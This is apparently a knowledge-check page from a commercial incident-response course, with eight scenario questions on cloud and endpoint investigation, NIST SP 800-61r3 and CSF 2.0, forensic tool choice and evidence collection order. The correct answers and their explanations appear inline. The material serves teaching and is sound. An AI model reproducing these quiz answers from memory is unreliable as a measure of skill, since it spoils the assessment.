In this module
IR0.6 Check My Knowledge
Operational Objective
IR0 established four things: the cross-plane incident shape, the five-step reasoning chain, the CSF 2.0 framework vocabulary, and the toolkit map. These eight scenario questions test whether those four things are internalised well enough to apply without referring back to the module. Answering seven or eight correctly means you are ready for IR1. Answering fewer than six means at least one of the four foundations is not yet in place — the questions and their feedback will tell you which, and the relevant subsection is the one to re-read before continuing.
Deliverable: Confirmation that IR0 is internalised. Readiness to move to IR1.
Estimated completion: 15 minutes
Check My Knowledge
1. Why does this course insist on investigating the cloud and the endpoint together rather than treating them as separate specialisms?
Because the same forensic tools are used for both, which reduces the training overhead
Because Microsoft recommends a unified approach in its official IR documentation
Because modern Microsoft-stack attacks cross the cloud-endpoint boundary in minutes, and an investigation limited to one side produces a containment plan the attacker routes around via the unexamined side
Because it is faster to query a single portal than to switch between two
Correct. The investigation scope has to match the attack scope. An AiTM attack that harvests cloud credentials almost always delivers an endpoint payload as well, and the endpoint compromise persists after a cloud-side reset if the endpoint investigation never happened. A ransomware intrusion that encrypts endpoints almost always leaves cloud persistence — OAuth apps, transport rules, service principals — that survives the endpoint rebuild. Cloud-only or endpoint-only investigation produces half an answer and a containment plan that leaves the other half of the attacker in place.
2. You find a PowerShell process creation record showing powershell.exe executed at 15:09 with an encoded command line, launched by outlook.exe, under the user account of the affected employee. Which statement correctly applies the three-statement evidence discipline?
This proves the attacker executed PowerShell at 15:09 after obtaining the user's credentials
This proves nothing conclusive, because process creation records can be tampered with
This proves PowerShell was executed at 15:09 under the user's context with evasion flags and an Outlook parent process; it does not prove whether the user or the attacker initiated the execution, or whether the encoded payload was malicious; the next step is to decode the payload, correlate with the user's email events around 15:09, and check network events from the process
This proves the user's credentials were compromised and PowerShell was used maliciously
Correct. Proves: PowerShell was executed at 15:09 under the user's logged-in context, with evasion flags, launched by Outlook — an unusual parent for PowerShell. Does not prove: whether the user or an attacker initiated the execution (the account context tells you the logged-in session, not who controlled the keyboard), whether the encoded payload is actually malicious (encoded PowerShell has legitimate uses), or what the payload does. Next step: decode the payload, pull EmailAttachmentInfo and EmailEvents for the fifteen minutes before 15:09 to identify the trigger message, check DeviceNetworkEvents for outbound connections from the process. The three-statement pattern keeps the investigation honest and the conclusions defensible.
3. According to current NIST guidance (SP 800-61 Revision 3), how does incident response relate to the phases you may remember from the 2012 Revision 2 lifecycle?
Revision 3 replaces the linear four-phase lifecycle with concurrent operations across six Functions of CSF 2.0 — Govern, Identify, Protect, Detect, Respond, Recover — where Detect, Respond, and Recover run in parallel during an active incident
Revision 3 added Govern and Recover as two new phases at the start and end of the Revision 2 lifecycle, preserving the four original phases in between
Revision 3 is an optional update; Revision 2's four-phase lifecycle is still NIST's primary incident response reference
Revision 3 is a US-federal-only document and does not apply to UK or EU organizations
Correct. NIST withdrew Revision 2 in April 2025 and replaced it entirely with Revision 3. The key structural change is that incident response is no longer modeled as a linear four-phase lifecycle. Rev 3 treats IR as activity distributed across the six CSF 2.0 Functions, with Detect, Respond, and Recover running concurrently during active incidents rather than sequentially. The other options describe common misconceptions: Rev 2 is fully withdrawn (not optional), Govern and Recover are Functions not appended phases, and NIST guidance is used globally regardless of where the organization is based.
4. You are writing an IR report that will be read by both the CISO (internal, operational) and the Head of Audit (external-facing, CSF 2.0-aligned). What is the current best practice for structuring it?
Write the entire report in CSF 2.0 Subcategory-reference language, because that is what the audit audience needs
Write an operational narrative in plain language that captures what happened, followed by a short framework mapping block that references the relevant CSF 2.0 Functions and Subcategories
Write two separate documents — one operational for the CISO, one framework-aligned for the Head of Audit
Skip the framework mapping entirely, because the operational narrative is what actually matters for containment decisions
Correct. Operational narrative first — what actually happened, in plain English a CFO can parse without a glossary — followed by a short mapping block that ties the findings to the CSF 2.0 Functions and Subcategories. This is legible to both audiences: the operational reader gets the story, the audit reader gets the mapping against the organization's plan. Option A buries the story under vocabulary. Option C doubles the work and doubles the risk of the two versions contradicting each other. Option D forces the audit reader to do the mapping themselves and signals out-of-date framework knowledge.
5. A finance-team employee clicks an AiTM phishing link at 14:31, and the initial alert in your queue is an Entra ID Protection anomalous-sign-in notification timestamped 14:42 (the token replay from the attacker's IP). It is now 15:20. Which of the four one-sided investigation failures is the most likely outcome if you investigate the alert cloud-side only?
The investigation will miss the supplier's bank details change, because that is an upstream process issue not visible in cloud logs
The investigation will contain the cloud side (session revocation, inbox rule removal, password reset) but miss the endpoint loader, the beacon in memory, and the harvested credential hashes — which the attacker will use to re-enter the environment via a different user weeks later
The investigation will be blocked at the initial validation step, because Entra ID Protection alerts cannot be triaged without endpoint context
The investigation will produce a forensically sound outcome, because the AiTM pattern is well-documented and cloud-side containment is the standard response
Correct. This is the specific failure mode illustrated in the NE scenario in IR0.1. Cloud-only containment removes the attacker from the identity plane but leaves the endpoint side of the attack — the loader on disk, the reflective beacon in memory, the harvested hashes including service account hashes — intact. The attacker retains a foothold that password resets do not reach. Weeks later, they re-authenticate using a service account hash, re-establish a beacon, and resume operations. The incident recurs. This is why the course insists on cross-plane investigation even when the alert only indicates cloud-side activity.
6. You are confirming a persistence mechanism and have two competing hypotheses. Hypothesis A: "The attacker created a scheduled task for persistence." Hypothesis B: "The attacker registered an OAuth application in Entra ID for persistence." You have time to test one first. Which tool-to-hypothesis mapping is correct?
Run Volatility 3 against a memory image, because memory forensics will reveal both persistence types
Run KAPE to collect triage artefacts from the endpoint, because KAPE captures everything relevant to both hypotheses
For Hypothesis A, query Task Scheduler event logs (Event ID 4698) or the registry key under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache. For Hypothesis B, query Entra ID audit logs for "Add service principal" and "Consent to application" events. The tool follows the hypothesis, not the other way around.
Run Microsoft Graph PowerShell against the tenant, because both persistence mechanisms are visible through the Graph API
Correct. This is the tool-first anti-pattern that the five-step reasoning chain prevents. The hypothesis determines the artefact, which determines the tool. For scheduled tasks, the evidence is in endpoint event logs or the TaskCache registry key — extracted via EZTools (EvtxECmd, Registry Explorer) against a KAPE collection. For OAuth app registration, the evidence is in Entra ID audit logs — extracted via KQL or Graph PowerShell against the tenant. Using memory forensics or triage collection as a starting point without a hypothesis produces the artefact-collector pattern — lots of output, no interpretation.
7. A mid-level SOC analyst finishes this course. They work at an 800-person organization, investigate two to three incidents per month, and find that most of their investigation findings — attacker techniques their current detection rules did not catch — sit unused after the report is filed. With six hours per week available for skill development, which adjacent discipline has the highest expected operational return?
Deeper memory forensics, because nation-state tradecraft is an emerging threat
Detection engineering, because the analyst's own investigations already produce the raw material (attacker techniques their rules did not catch) that detection engineering converts into production rules — and each rule reduces the rate of future incidents of that class
Threat hunting, because proactive capability is always the right next investment
Network forensics, because the IR course does not cover the network telemetry side of investigation
Correct. The specific symptom described — findings go unused — points directly at the detection engineering gap. Every investigation produces findings; detection engineering is the discipline that converts them into rules that prevent recurrence. The skill compounds: each rule works for years after you write it, reducing the volume of incidents of that type. Memory forensics at depth is high-value but rarely exercised at two or three incidents per month. Hunting is valuable but presupposes detection-engineering maturity — hunting on top of a weak detection stack produces work the rules should have caught. Network forensics is worth pursuing when your environment has usable network telemetry, but for this analyst's described symptom, detection engineering is the sharpest fit.
8. You are the first responder on scene for an endpoint that shows signs of compromise from several days ago. The attacker has established persistence, but current activity pattern is data staging, not destruction — a beacon resident in memory, TCP connections to external IPs, and several gigabytes staged in a user-profile folder. The endpoint is reachable and you have forensic tools on a USB. What do you collect first?
Run KAPE immediately, because it collects the widest range of forensic artefacts quickly
Isolate the endpoint first to stop the data staging, then collect forensic evidence from the isolated system
Capture memory first with WinPMem, then run KAPE for the disk triage collection. Memory is the most volatile evidence, the in-memory beacon disappears on reboot or isolation, and running KAPE first modifies disk and memory state. Once memory is captured and hashed, then proceed with disk collection
Run Volatility 3 against the live system, because it is the memory forensics tool
Correct. Order of volatility. Memory is the most volatile evidence class — a reflective beacon, active network connections, decrypted credentials in LSASS, and loaded-but-not-saved indicators all disappear on reboot or isolation. WinPMem captures the memory image from the running system with minimal footprint. Running KAPE first writes to disk, modifies the MFT, loads processes, and changes the memory state you are about to capture. Once memory is captured and hashed, you proceed with KAPE for the disk collection, then isolate. Volatility 3 analyzes captured memory images — it does not capture memory from the live system; that is WinPMem's job. Isolation before evidence collection destroys the most volatile evidence; it is the right action when the attacker is actively destructive (active encryption, active destruction) but wrong when the current activity is data staging that you can interrupt a few minutes later without losing evidence that is already gone.
How was this module?
Your feedback helps us improve the course. One click is enough — comments are optional.
Thank you — your feedback has been received.
© 2026 Ridgeline Cyber Defence™ Ltd. Content may not be reproduced or redistributed. Worked artifacts may be adapted for use within your organization.